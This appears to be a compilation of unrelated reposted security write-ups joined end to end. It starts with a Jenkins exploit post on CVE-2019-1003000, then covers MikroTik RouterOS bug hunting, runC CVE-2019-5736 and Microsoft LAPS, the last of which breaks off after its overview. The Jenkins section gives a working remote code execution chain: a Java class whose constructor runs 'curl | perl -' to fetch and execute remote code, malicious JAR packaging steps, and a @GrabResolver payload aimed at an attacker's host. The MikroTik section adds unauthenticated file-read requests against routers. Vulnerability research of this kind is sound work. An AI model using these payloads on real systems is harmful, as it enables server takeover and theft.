As the previous article said, in order to utilize the vulnerability, we want to find a code execution gadget that can be chained with the ACL bypass vulnerability into a well-deserved pre-auth remote code execution! But I failed. Due to the feature of dynamic routing, Jenkins checks the permission again before most dangerous invocations (such as the Script Console)! Although we could bypass the first ACL, we still can’t do many things 🙁

After Jenkins released the Security Advisory and fixed the dynamic routing vulnerability on 2018-12-05, I started to organize my notes in order to write this Hacking Jenkins series. While reviewing the notes, I found another way to exploit a gadget that I had failed to exploit before! Therefore, part two is the story of that! This is also one of my favorite exploits and is really worth reading 🙂

Vulnerability Analysis

First, we start from the Jenkins Pipeline to explain CVE-2019-1003000! Generally, the reason why people choose Jenkins is that Jenkins provides a powerful Pipeline feature, which makes writing scripts for software building, testing and delivering easier! You can imagine Pipeline as just a powerful language to manipulate Jenkins (in fact, Pipeline is a DSL built with Groovy).

In order to check whether the syntax of user-supplied scripts is correct or not, Jenkins provides an interface for developers! Just think about if you are the developer, how will you implement this syntax-error-checking function? You can just write an AST(Abstract Syntax Tree) parser by yourself, but it’s too tough. So the easiest way is to reuse existing function and library!

As we mentioned before, Pipeline is just a DSL built with Groovy, so Pipeline must follow the Groovy syntax! If the Groovy parser can deal with the Pipeline script without errors, the syntax must be correct! The code fragments here shows how Jenkins validates the Pipeline:

public JSON doCheckScriptCompile(@QueryParameter String value) {
    try {
        CpsGroovyShell trusted = new CpsGroovyShellFactory(null).forTrusted().build();
        new CpsGroovyShellFactory(null).withParent(trusted).build().getClassLoader().parseClass(value);
    } catch (CompilationFailedException x) {
        return JSONArray.fromObject(CpsFlowDefinitionValidator.toCheckStatus(x).toArray());
    }
    return CpsFlowDefinitionValidator.CheckStatus.SUCCESS.asJSON();
    // Approval requirements are managed by regular stapler form validation (via doCheckScript)
}

Here Jenkins validates the Pipeline with the method GroovyClassLoader.parseClass(…)! It should be noted that this is just an AST parsing. Without running execute() method, any dangerous invocation won’t be executed! If you try to parse the following Groovy script, you get nothing 🙁

print java.lang.Runtime.getRuntime().exec("id")

From the view of developers, the Pipeline can control Jenkins, so it must be dangerous and requires a strict permission check before every Pipeline invocation! However, this is just a simple syntax validation, so the permission check here is less strict than usual! Without any execute() method, it’s just an AST parser and must be safe! This is what I thought the first time I saw this validation. However, while I was writing the technique blog, Meta-Programming flashed into my mind!
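The “parsing is not execution” assumption is not unique to Groovy. As a rough analogy (with Python’s ast module standing in for GroovyClassLoader.parseClass), parsing dangerous-looking source yields only a syntax tree and produces no side effects:

```python
import ast

# Parsing builds an AST; it never runs the code, just like
# GroovyClassLoader.parseClass(...) never calls execute().
source = "import os\nos.system('touch pwned')"
tree = ast.parse(source)

# We get structure back, not side effects: no 'pwned' file is created.
print(type(tree).__name__)   # the root node type
print(len(tree.body))        # number of top-level statements
```

The rest of the article is about finding the cracks in exactly this assumption: hooks that fire during compilation itself.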

What is Meta-Programming

Meta-Programming is a programming concept! The idea of Meta-Programming is to provide an abstract layer for programmers to think about the program in a different way, and to make the program more flexible and efficient! There is no clear definition of Meta-Programming. In general, both a program processing itself and writing programs that operate on other programs (a compiler, interpreter or preprocessor…) are Meta-Programming! The philosophy here is very profound and could even be a big subject in programming languages!

If it is still hard to understand, you can just regard eval(...) as another form of Meta-Programming, which lets you operate on the program on the fly. Although it’s a little bit inaccurate, it’s still a good metaphor for understanding! In software engineering, there are also lots of techniques related to Meta-Programming. For example:

  • C Macro
  • C++ Template
  • Java Annotation
  • Ruby (Ruby is a Meta-Programming friendly language; there are even books about it)
  • DSL(Domain Specific Languages, such as Sinatra and Gradle)

When we are talking about Meta-Programming, we classify it into (1)compile-time and (2)run-time Meta-Programming according to the scope. Today, we focus on the compile-time Meta-Programming!

P.S. It’s hard to explain Meta-Programming in a non-native language. If you are interested, here are some materials: Wiki, Ref1, Ref2
P.S. I am not a programming language master, so if there is anything incorrect or inaccurate, please forgive me <(_ _)>

How to Exploit?

From the previous section we know Jenkins validates Pipeline by parseClass(…) and learn that Meta-Programming can poke the parser during compile-time! Compiling(or parsing) is a hard work with lots of tough things and hidden features. So, the idea is, is there any side effect we can leverage?

There are many simple cases which have proved Meta-Programming can make a program vulnerable, such as the macro expansion in the C language:

#define a 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
#define b a,a,a,a,a,a,a,a,a,a,a,a,a,a,a,a
#define c b,b,b,b,b,b,b,b,b,b,b,b,b,b,b,b
#define d c,c,c,c,c,c,c,c,c,c,c,c,c,c,c,c
#define e d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d
#define f e,e,e,e,e,e,e,e,e,e,e,e,e,e,e,e
__int128 x[]={f,f,f,f,f,f,f,f};

or the compiler resource bomb (making a 16GB ELF from just 18 bytes):

int main[-1u]={1};

or calculating Fibonacci numbers with the compiler:

template<int n>
struct fib {
    static const int value = fib<n-1>::value + fib<n-2>::value;
};
template<> struct fib<0> { static const int value = 0; };
template<> struct fib<1> { static const int value = 1; };

int main() {
    int a = fib<10>::value; // 55
    int b = fib<20>::value; // 6765
    int c = fib<40>::value; // 102334155
}
From the assembly language of compiled binary, we can make sure the result is calculated at compile-time, not run-time!

$ g++ template.cpp -o template
$ objdump -M intel -d template
00000000000005fa <main>:
 5fa:   55                      push   rbp
 5fb:   48 89 e5                mov    rbp,rsp
 5fe:   c7 45 f4 37 00 00 00    mov    DWORD PTR [rbp-0xc],0x37
 605:   c7 45 f8 6d 1a 00 00    mov    DWORD PTR [rbp-0x8],0x1a6d
 60c:   c7 45 fc cb 7e 19 06    mov    DWORD PTR [rbp-0x4],0x6197ecb
 613:   b8 00 00 00 00          mov    eax,0x0
 618:   5d                      pop    rbp
 619:   c3                      ret
 61a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]

For more examples, you can refer to the article Build a Compiler Bomb on StackOverflow!
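As a small run-anywhere analogy to this compile-time evaluation, CPython’s compiler folds constant expressions while compiling, so the arithmetic is already done before a single bytecode instruction runs:

```python
# CPython's peephole optimizer folds constant expressions at compile
# time, loosely analogous to the C++ template trick above:
code = compile("x = 6 * 7", "<demo>", "exec")

# The folded result, 42, is baked into the code object as a constant;
# no multiplication happens at run time.
print(42 in code.co_consts)
```

The scale is obviously different, but the principle is the same: the compiler does real work, and real work can have exploitable side effects.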

First Attempt

Back to our exploitation, Pipeline is just a DSL built with Groovy, and Groovy is also a Meta-Programming friendly language. We start reading the Groovy official Meta-Programming manual to find some exploitation ways. In the section 2.1.9, we found the @groovy.transform.ASTTest annotation. Here is its description:

@ASTTest is a special AST transformation meant to help debugging other AST transformations or the Groovy compiler itself. It will let the developer “explore” the AST during compilation and perform assertions on the AST rather than on the result of compilation. This means that this AST transformation gives access to the AST before the bytecode is produced. @ASTTest can be placed on any annotable node and requires two parameters:

What! perform assertions on the AST? Isn’t that what we want? Let’s write a simple Proof-of-Concept in local environment first:

@groovy.transform.ASTTest(value={
    assert java.lang.Runtime.getRuntime().exec("touch pwned")
})
def x

$ ls
poc.groovy
$ groovy poc.groovy
$ ls
poc.groovy  pwned

Cool, it works! However, while reproducing this on the remote Jenkins, it shows:

unable to resolve class org.jenkinsci.plugins.workflow.libs.Library

What the hell!!! What’s wrong with that?

With a little bit of digging, we found the root cause. This is caused by the Pipeline Shared Groovy Libraries Plugin! In order to reuse functions in Pipelines, Jenkins provides a feature to import customized libraries into a Pipeline! Jenkins will load this library before every executed Pipeline. As a result, the problem becomes a lack of the corresponding library in the classpath during compile-time. That’s why the error unable to resolve class occurs!

How to fix this problem? It’s simple! Just go to the Jenkins Plugin Manager and remove the Pipeline Shared Groovy Libraries Plugin! That fixes the problem, and then we can execute arbitrary code without any error! But this is not a good solution, because the plugin is installed along with Pipeline. It’s lame to ask an administrator to remove the plugin for code execution! We stopped digging into this and tried to find another way!

Second Attempt

We continued reading the Groovy Meta-Programming manual and found another interesting annotation: @Grab. There is no detailed information about @Grab in the manual. However, we found another article, Dependency management with Grape, via a search engine!

Oh, from the article we know Grape is a built-in JAR dependency management system in Groovy! It can help programmers import libraries that are not in the classpath. The usage looks like:

@Grab(group='org.springframework', module='spring-orm', version='3.2.5.RELEASE')
import org.springframework.jdbc.core.JdbcTemplate

By using the @Grab annotation, it can automatically import JAR files that are not in the classpath during compile-time! If you just want to bypass the Pipeline sandbox via a valid credential and the permission of Pipeline execution, that’s enough. You can follow the PoC provided by @adamyordan to execute arbitrary commands!

However, without a valid credential and execute() method, this is just an AST parser and you even can’t control files on remote server. So, what can we do? By diving into more about @Grab, we found another interesting annotation — @GrabResolver:

@GrabResolver(name='restlet', root='')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet

If you are smart enough, you would like to change the root parameter to a malicious website! Let’s try this in local environment:

new GroovyClassLoader().parseClass('''
@GrabResolver(name='restlet', root='')
@Grab(group='org.restlet', module='org.restlet', version='1.1.6')
import org.restlet
''')

- - [18/Dec/2018:18:56:54 +0800] "HEAD /org/restlet/org.restlet/1.1.6/org.restlet-1.1.6-javadoc.jar HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0"

Wow, it works! Now, we believe we can make Jenkins import any malicious library by Grape! However, the next problem is, how to get code execution?

The Way to Code Execution

In the exploitation, the target is always escalating the read primitive or write primitive to code execution! From the previous section, we can write malicious JAR file into remote Jenkins server by Grape. However, the next problem is how to execute code?

By diving into the Grape implementation in Groovy, we realized the library fetching is done by the class groovy.grape.GrapeIvy! We started to look for anything we could leverage, and we noticed an interesting method, processOtherServices(…)!

void processOtherServices(ClassLoader loader, File f) {
    try {
        ZipFile zf = new ZipFile(f)
        ZipEntry serializedCategoryMethods = zf.getEntry("META-INF/services/org.codehaus.groovy.runtime.SerializedCategoryMethods")
        if (serializedCategoryMethods != null) {
            processSerializedCategoryMethods(zf.getInputStream(serializedCategoryMethods))
        }
        ZipEntry pluginRunners = zf.getEntry("META-INF/services/org.codehaus.groovy.plugins.Runners")
        if (pluginRunners != null) {
            processRunners(zf.getInputStream(pluginRunners), f.getName(), loader)
        }
    } catch(ZipException ignore) {
        // ignore files we can't process, e.g. non-jar/zip artifacts
        // TODO log a warning
    }
}
A JAR file is just a subset of the ZIP format. In processOtherServices(…), Grape registers services if certain specified entry points are present. Among them, the Runners entry interests me. By looking into the implementation of processRunners(…), we found this:

void processRunners(InputStream is, String name, ClassLoader loader) {
    is.text.readLines().each {
        GroovySystem.RUNNER_REGISTRY[name] = loader.loadClass(it.trim()).newInstance()
    }
}
Here we see the newInstance(). Does that mean we can call the constructor of any class? Yes! So we can just create a malicious JAR file, put the class name into the file META-INF/services/org.codehaus.groovy.plugins.Runners, and the constructor will be invoked, executing arbitrary code!
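The dangerous pattern here, reading fully qualified class names from a well-known services file and instantiating each one, can be sketched outside Groovy too. Below is a hedged Python analogue (importlib standing in for loader.loadClass, and a benign stdlib class standing in for the attacker's class):

```python
import importlib

def process_runners(services_text):
    """Instantiate every class listed one-per-line, Grape-style.

    Each line is a fully qualified name like 'collections.Counter'.
    Nothing stops a hostile archive from listing a class whose
    constructor does something dangerous -- that is the whole bug.
    """
    registry = {}
    for line in services_text.splitlines():
        name = line.strip()
        if not name:
            continue
        module_name, _, class_name = name.rpartition(".")
        cls = getattr(importlib.import_module(module_name), class_name)
        registry[name] = cls()  # the constructor runs here, unconditionally
    return registry

# Benign stand-in for META-INF/services/org.codehaus.groovy.plugins.Runners
registry = process_runners("collections.Counter\n")
print(list(registry))
```

Swap the benign class for one whose constructor shells out, and you have exactly the primitive the exploit below uses.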

Here is the full exploit:

public class Poc {
    public Poc() {
        try {
            String payload = "curl | perl -";
            String[] cmds = {"/bin/bash", "-c", payload};
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) { }
    }
}
$ javac
$ mkdir -p META-INF/services/
$ echo Orange > META-INF/services/org.codehaus.groovy.plugins.Runners
$ find .

$ jar cvf poc-1.jar tw/
$ cp poc-1.jar ~/www/tw/orange/poc/1/
$ curl -I http://[your_host]/tw/orange/poc/1/poc-1.jar
HTTP/1.1 200 OK
Date: Sat, 02 Feb 2019 11:10:55 GMT


@GrabResolver(name='', root='http://[your_host]/')%0a
@Grab(group='', module='poc', version='1')%0a
import Orange;



With the exploit, we can gain full access on remote Jenkins server! We use Meta-Programming to import malicious JAR file during compile-time, and executing arbitrary code by the Runner service! Although there is a built-in Groovy Sandbox(Script Security Plugin) on Jenkins to protect the Pipeline, it’s useless because the vulnerability is in compile-time, not in run-time!

Because this is an attack vector on the Groovy core, all methods related to the Groovy parser are affected! It breaks the developer’s assumption that no execution means no problem. It is also an attack vector that requires some knowledge of computer science; otherwise, you would never think of Meta-Programming! That’s what makes this vulnerability interesting. Aside from the entry points doCheckScriptCompile(...) and toJson(...) I reported, after the vulnerability had been fixed, Mikhail Egorov quickly found another entry point to trigger it!

Apart from that, this vulnerability can also be chained with my previous exploit from Hacking Jenkins Part 1 to bypass the Overall/Read restriction and achieve a well-deserved pre-auth remote code execution. If you fully understood the article, you know how to chain them 😛

Thank you for reading this article and hope you like it! Here is the end of Hacking Jenkins series, I will publish more interesting researches in the future 🙂

Make It Rain with MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying out six figures for MikroTik vulnerabilities, I figured it was a good time to finally put some of my RouterOS bug hunting into writing. Really, any time is a good time to investigate RouterOS. It’s a fun target. Hell, just preparing this write up I found a new unauthenticated vulnerability. You could too.

Laying the Groundwork

Now I know you’re already looking up Rolex prices, but calm down, Sparky. You still have work to do. Even if you’re just planning to download a simple fuzzer and pray for a pay day, you’ll still need to read this first section.

Acquiring Software

You don’t have to rush to Amazon to acquire a router. MikroTik makes RouterOS ISOs available on their website. The ISO can be used to create a virtual host with VirtualBox or VMware.

Naturally, Mikrotik published 6.42.12 the day I published this blog

You can also extract the system files from the ISO.

albinolobster@ubuntu:~/6.42.11$ 7z x mikrotik-6.42.11.iso
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)
Processing archive: mikrotik-6.42.11.iso
Extracting  advanced-tools-6.42.11.npk
Extracting calea-6.42.11.npk
Extracting defpacks
Extracting dhcp-6.42.11.npk
Extracting dude-6.42.11.npk
Extracting gps-6.42.11.npk
Extracting hotspot-6.42.11.npk
Extracting ipv6-6.42.11.npk
Extracting isolinux
Extracting isolinux/
Extracting isolinux/initrd.rgz
Extracting isolinux/isolinux.bin
Extracting isolinux/isolinux.cfg
Extracting isolinux/linux
Extracting isolinux/TRANS.TBL
Extracting kvm-6.42.11.npk
Extracting lcd-6.42.11.npk
Extracting LICENSE.txt
Extracting mpls-6.42.11.npk
Extracting multicast-6.42.11.npk
Extracting ntp-6.42.11.npk
Extracting ppp-6.42.11.npk
Extracting routing-6.42.11.npk
Extracting security-6.42.11.npk
Extracting system-6.42.11.npk
Extracting TRANS.TBL
Extracting ups-6.42.11.npk
Extracting user-manager-6.42.11.npk
Extracting wireless-6.42.11.npk
Extracting [BOOT]/Bootable_NoEmulation.img
Everything is Ok
Folders: 1
Files: 29
Size: 26232176
Compressed: 26335232

MikroTik packages a lot of their software in their custom .npk format. There’s a tool that’ll unpack these, but I prefer to just use binwalk.

albinolobster@ubuntu:~/6.42.11$ binwalk -e system-6.42.11.npk
0 0x0 NPK firmware header, image size: 15616295, image name: "system", description: ""
4096 0x1000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9818075 bytes, 1340 inodes, blocksize: 262144 bytes, created: 2018-12-21 09:18:10
9822304 0x95E060 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9842177 0x962E01 Unix path: /sys/devices/system/cpu
9846974 0x9640BE ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9904147 0x972013 Unix path: /sys/devices/system/cpu
9928025 0x977D59 Copyright string: "Copyright 1995-2005 Mark Adler "
9928138 0x977DCA CRC32 polynomial table, little endian
9932234 0x978DCA CRC32 polynomial table, big endian
9958962 0x97F632 xz compressed data
12000822 0xB71E36 xz compressed data
12003148 0xB7274C xz compressed data
12104110 0xB8B1AE xz compressed data
13772462 0xD226AE xz compressed data
13790464 0xD26D00 xz compressed data
15613512 0xEE3E48 xz compressed data
15616031 0xEE481F Unix path: /var/pdb/system/crcbin/milo 3801732988
albinolobster@ubuntu:~/6.42.11$ ls -o ./_system-6.42.11.npk.extracted/squashfs-root/
total 64
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 bin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 boot
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 dev
lrwxrwxrwx 1 albinolobster 11 Dec 21 04:18 dude -> /flash/dude
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 etc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 flash
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 home
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 initrd
drwxr-xr-x 4 albinolobster 4096 Dec 21 04:18 lib
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 nova
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 old
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 pckg -> /ram/pckg
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 proc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 ram
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 rw -> /flash/rw
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sbin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sys
lrwxrwxrwx 1 albinolobster 7 Dec 21 04:18 tmp -> /rw/tmp
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 usr
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 var

Hack the Box

When looking for vulnerabilities it’s helpful to have access to the target’s filesystem. It’s also nice to be able to run tools, like GDB, locally. However, the shell that RouterOS offers isn’t a normal unix shell. It’s just a command line interface for RouterOS commands.

Who am I?!

Fortunately, I have a work around that will get us root. RouterOS will execute anything stored in the /rw/DEFCONF file due to the way the rc.d script S12defconf is written.

Friends don’t let friends use eval

A normal user has no access to that file, but thanks to the magic of VMs and Live CDs you can create the file and insert any commands you want. The exact process takes too many words to explain. Instead I made a video. The screen recording is five minutes long and it goes from VM installation all the way through root telnet access.

With root telnet access you have full control of the VM. You can upload more tooling, attach to processes, watch logs, etc. You’re now ready to explore the router’s attack surface.

Is Anyone Listening?

You can quickly determine the network reachable attack surface thanks to the ps command.

Looks like the router listens on some well known ports (HTTP, FTP, Telnet, and SSH), but also some lesser known ports. btest on port 2000 is the bandwidth-test server. mproxy on 8291 is the service that WinBox interfaces with. WinBox is an administrative tool that runs on Windows. It shares all the same functionality as the Telnet, SSH, and HTTP interfaces.

Hello, I load .dll straight off the router. Yes, that has been a problem. Why do you ask?

The Real Attack Surface

The ps output makes it appear as if there are only a few binaries to bug hunt in. But nothing could be further from the truth. Both the HTTP server and Winbox speak a custom protocol that I’ll refer to as WinboxMessage (the actual code calls it nv::message). The protocol specifies which binary a message should be routed to. In truth, with all packages installed, there are about 90 different network reachable binaries that use the WinboxMessage protocol.

There’s also an easy way to figure out which binaries I’m referring to. A list can be found in each package’s /nova/etc/loader/*.x3 file. x3 is a custom file format so I wrote a parser. The example output goes on for a while so I snipped it a bit.

albinolobster@ubuntu:~/routeros/parse_x3/build$ ./x3_parse -f ~/6.42.11/_system-6.42.11.npk.extracted/squashfs-root/nova/etc/loader/system.x3 

The x3 file also contains each binary’s “SYS TO” identifier. This is the identifier that the WinboxMessage protocol uses to determine where a message should be handled.

Me Talk WinboxMessage Pretty One Day

Knowing which binaries you should be able to reach is useful, but actually knowing how to communicate with them is quite a bit more important. In this section, I’ll walk through a couple of examples.

Getting Started

Let’s say I want to talk to /nova/bin/undo. Where do I start? Let’s start with some code. I’ve written a bunch of C++ that will do all of the WinboxMessage protocol formatting and session handling. I’ve also created a skeleton program that you can build off of. main is pretty bare.

std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, ip, port))
{
    return EXIT_FAILURE;
}

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
    std::cerr << "Failed to connect to the remote host"
              << std::endl;
    return EXIT_FAILURE;
}

You can see the Winbox_Session class is responsible for connecting to the router. It’s also responsible for authentication logic as well as sending and receiving messages.

Now, from the output above, you know that /nova/bin/undo has a SYS TO identifier of 17. In order to reach undo, you need to update the code to create a message and set the appropriate SYS TO identifier (the new part is marked).

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
    std::cerr << "Failed to connect to the remote host"
              << std::endl;
    return EXIT_FAILURE;
}

WinboxMessage msg;
msg.set_to(17); // new: route to undo's SYS TO identifier

Command and Control

Each message also requires a command. As you’ll see in a little bit, each command will invoke specific functionality. There are some builtin commands (0xfe0001–0xfe0016) used by all handlers and some custom commands that have unique implementations.

Pop /nova/bin/undo into a disassembler and find the nv::Looper::Looper constructor’s only code cross-reference.

Follow the offset to the vtable that I’ve labeled undo_handler and you should see the following.

This is the vtable for undo’s WinboxMessage handling. A bunch of the functions directly correspond to the builtin commands I mentioned earlier (e.g. 0xfe0001 is handled by nv::Handler::cmdGetPolicies). You can also see I’ve highlighted the unknown command function. Non-builtin commands get implemented there.

Since the non-builtin commands are usually the most interesting, you’re going to jump into cmdUnknown. You can see it starts with a command based jump table.

It looks like the commands start at 0x80001. Looking through the code a bit, command 0x80002 appears to have a useful string to test against. Let’s see if you can reach the “nothing to redo” code path.

You need to update the skeleton code to request command 0x80002. You’ll also need to add in the send and receive logic. I’ve marked the new part.

WinboxMessage msg;
msg.set_to(17);
msg.set_command(0x80002); // new
winboxSession.send(msg);  // new
std::cout << "req: " << msg.serialize_to_json() << std::endl;

if (!winboxSession.receive(msg)) // new
{
    std::cerr << "Error receiving a response." << std::endl;
    return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

if (msg.has_error())
{
    std::cerr << msg.get_error_string() << std::endl;
}

After compiling and executing the skeleton you should get the expected, “nothing to redo.”

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i -p 8291
req: {bff0005:1,uff0006:1,uff0007:524290,Uff0001:[17]}
resp: {uff0003:2,uff0004:2,uff0006:1,uff0008:16646150,sff0009:'nothing to redo',Uff0001:[],Uff0002:[17]}
nothing to redo
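The req/resp dumps above are worth decoding once by hand. Each key is a type prefix (b for boolean, u for u32, s for string, U for a u32 array) followed by a hex field id, so uff0007:524290 is command 0x80002 and Uff0001:[17] is the SYS TO route. Here is a toy Python serializer that reproduces only the textual dump format (not the binary wire format), with field meanings inferred from the outputs shown in this article:

```python
# Illustrative only: mimics the JSON-ish dump format printed by the
# skeleton, where each key is a type prefix plus a hex field id.
def dump_winbox_message(fields):
    parts = []
    for prefix, field_id, value in fields:
        if prefix == "U":                      # array of u32s
            rendered = "[%s]" % ",".join(str(v) for v in value)
        elif prefix == "s":                    # string
            rendered = "'%s'" % value
        else:                                  # b / u scalars
            rendered = str(value)
        parts.append("%s%x:%s" % (prefix, field_id, rendered))
    return "{%s}" % ",".join(parts)

# The request the skeleton printed for /nova/bin/undo, command 0x80002:
req = dump_winbox_message([
    ("b", 0xff0005, 1),          # reply expected
    ("u", 0xff0006, 1),          # request id
    ("u", 0xff0007, 0x80002),    # command
    ("U", 0xff0001, [17]),       # SYS TO: route to undo
])
print(req)
```

Being able to read these dumps at a glance makes the later mproxy examples, and the CVE-2018-14847 traffic, much easier to follow.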

There’s Rarely Just One

In the previous example, you looked at the main handler in undo, which was addressable simply as 17. However, the majority of binaries have multiple handlers. In the following example, you’ll examine /nova/bin/mproxy’s handler #2. I like this example because it’s the vector for CVE-2018–14847 and it helps demystify these weird binary blobs:

My exploit for CVE-2018–14847 delivers a root shell. Just sayin’.

Hunting for Handlers

Open /nova/bin/mproxy in IDA and find the nv::Looper::addHandler import. In 6.42.11, there are only two code cross references to addHandler. It’s easy to identify the handler you’re interested in, handler 2, because the handler identifier is pushed onto the stack right before addHandler is called.

If you look up to where nv::Handler* is loaded into edi then you’ll find the offset for the handler’s vtable. This structure should look very familiar:

Again, I’ve highlighted the unknown command function. The unknown command function for this handler supports seven commands:

  1. Opens a file in /var/pckg/ for writing.
  2. Writes to the open file.
  3. Opens a file in /var/pckg/ for reading.
  4. Reads the open file.
  5. Cancels a file transfer.
  6. Creates a directory in /var/pckg/.
  7. Opens a file in /home/web/webfig/ for reading.

Commands 4, 5, and 7 do not require authentication.

Open a File

Let’s try to open a file in /home/web/webfig/ with command 7. This is the command that the FIRST_PAYLOAD in the exploit-db screenshot uses. If you look at the handling of command 7 in the code, you’ll see that the first thing it looks for is a string with an id of 1.

The string is the filename you want to open. What file in /home/web/webfig is interesting?

The real answer is that none of them look interesting. But the file named list contains a list of the installed packages and their version numbers.

Let’s translate the open-file request into a WinboxMessage. Returning to the skeleton program, you’ll want to overwrite the set_to and set_command calls. You’ll also want to insert the add_string call. I’ve marked the new portion again.

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
    std::cerr << "Failed to connect to the remote host"
              << std::endl;
    return EXIT_FAILURE;
}

WinboxMessage msg;
msg.set_to(2,2); // new: mproxy, second handler
msg.set_command(7); // new: open a file for reading
msg.add_string(1, "list"); // new: the file to open
winboxSession.send(msg);

std::cout << "req: " << msg.serialize_to_json() << std::endl;

if (!winboxSession.receive(msg))
{
    std::cerr << "Error receiving a response." << std::endl;
    return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

When running this code you should see something like this:

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i -p 8291
req: {bff0005:1,uff0006:1,uff0007:7,s1:'list',Uff0001:[2,2]}
resp: {u2:1818,ufe0001:3,uff0003:2,uff0006:1,Uff0001:[],Uff0002:[2,2]}

You can see the response from the server contains u2:1818. Look familiar?

1818 is the size of the list

As this is running quite long, I’ll leave the exercise of reading the file’s content up to the reader. This very simple CVE-2018–14847 proof of concept contains all the hints you’ll need.


I’ve shown you how to get the RouterOS software and root a VM. I’ve shown you the attack surface and taught you how to navigate the system binaries. I’ve given you a library to handle Winbox communication and shown you how to use it. If you want to go deeper and nerd out on protocol minutiae then check out my talk. Otherwise, you now know enough to be dangerous.

Good luck and happy hacking!

CVE-2019-5736 Linux Flaw in runC Allows Unauthorized Root Access

Original text by Milena Dimitrova

CVE-2019-5736 is yet another Linux vulnerability, discovered in the core runC container code. The runC tool is described as a lightweight, portable implementation of the Open Container Format (OCF) that provides a container runtime.

CVE-2019-5736 Technical Details

The security flaw potentially affects several open-source container management systems. Simply put, the flaw allows attackers to gain unauthorized root access to the host operating system, thus escaping the Linux container.

In more technical terms, the vulnerability:

allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe, as explained in the official advisory.
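The exploit itself is not reproduced here, but the /proc/self/exe mechanism at its core is easy to observe. The following Linux-only Python sketch shows that any process can obtain a file descriptor to its own running binary via /proc/self/exe — the same magic symlink that, in vulnerable runC versions, lets a container process reach the host runc binary through /proc/[runc-pid]/exe:

```python
import os

# On Linux, /proc/self/exe is a magic symlink to the binary image of
# the current process. CVE-2019-5736 abuses the fact that when runc
# joins a container, a container process can open the *host* runc
# binary through this mechanism and then overwrite it.
fd = os.open("/proc/self/exe", os.O_RDONLY)
header = os.read(fd, 4)
os.close(fd)

# For this Python process the "binary" is the interpreter itself,
# an ELF executable, so the file starts with the ELF magic bytes.
print(header == b"\x7fELF")
```

The patch addresses this by making runc create a sealed, in-memory copy of its own binary before entering the container, so the descriptor a container process can reach no longer points at the host file.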

The CVE-2019-5736 vulnerability was unearthed by open source security researchers Adam Iwaniuk and Borys Popławski. However, it was publicly disclosed by Aleksa Sarai, a senior software engineer and runC maintainer at SUSE Linux GmbH on Monday.

“I am one of the maintainers of runc (the underlying container runtime underneath Docker, cri-o, containerd, Kubernetes, and so on). We recently had a vulnerability reported which we have verified and have a patch for,” Sarai wrote.

The researcher also said that a malicious user would be able to run any command (it doesn’t matter if the command is not attacker-controlled) as root within a container in either of these contexts:

– Creating a new container using an attacker-controlled image.
– Attaching (docker exec) into an existing container which the attacker had previous write access to.

It should also be noted that CVE-2019-5736 isn’t blocked by the default AppArmor policy, nor by the default SELinux policy on Fedora, due to the fact that container processes appear to be running as container_runtime_t.

Nonetheless, the flaw is blocked by correct use of user namespaces, where the host root is not mapped into the container’s user namespace.


CVE-2019-5736 Patch and Mitigation

Red Hat says that the flaw can be mitigated when SELinux is enabled in targeted enforcing mode, a configuration that is the default on Red Hat Enterprise Linux, CentOS, and Fedora.

There’s also a patch released by the maintainers of runC available on GitHub. Please note that all projects which are based on runC should apply the patches themselves.

Who’s Affected?

Debian and Ubuntu are affected by the vulnerability, as are container systems running LXC, a Linux containerization tool that predates Docker. Apache Mesos container code is also affected.

Companies such as Google, Amazon, Docker, and Kubernetes have also released fixes for the flaw.

Malicious use of Microsoft LAPS

Original text by Akijosberry

LAPS Overview:

LAPS (Local Administrator Password Solution) is a tool for managing local administrator passwords on domain-joined computers. It stores passwords/secrets in a confidential attribute in the computer’s corresponding Active Directory object. LAPS eliminates the risk of lateral movement by generating random, per-machine local administrator passwords. The LAPS solution is a Group Policy Client Side Extension (CSE) which is installed on all managed machines to perform all management tasks.

